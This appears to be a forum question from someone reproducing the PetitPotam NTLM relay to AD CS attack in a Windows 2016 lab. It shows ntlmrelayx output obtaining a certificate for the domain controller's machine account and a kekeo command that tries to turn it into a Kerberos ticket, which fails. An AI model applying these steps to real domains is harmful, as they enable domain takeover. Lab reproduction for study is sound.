I’m following this article to reproduce the EFS bug: https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/
- Windows 2016 AD (Hostname: W2016$)
- Windows 2016 SRV01 (Running AD CS service)
- Windows 2016 SRV02 (Attack machine)
I’ve successfully generated the certificate with ntlmrelayx
(*) Skipping user W2016$ since attack was already performed (*) GOT CERTIFICATE! (*) Base64 certificate of user W2016$: ...
Then I logged in to SRV02 with a low privilege user. When I pass the ticket in kekeo, it results in KDC_ERROR_CLIENT_NOT_TRUSTED error:
# tgt::ask /pfx:xxx /user:W2016$ /domain:corp.aaron.com /ptt ... Realm : corp.xx.com (corp) User : W2016$ (W2016$) CName : W2016$ (KRB_NT_PRINCIPAL (1)) SName : krbtgt/corp.xx.com (KRB_NT_SRV_INST (2)) Need PAC : Yes Auth mode : RSA (kdc) name: W2016.corp.xx.com (auto) (kdc) addr: 172.16.177.130 (auto) KDC_ERROR_CLIENT_NOT_TRUSTED (62)
Does anyone know what’s wrong here?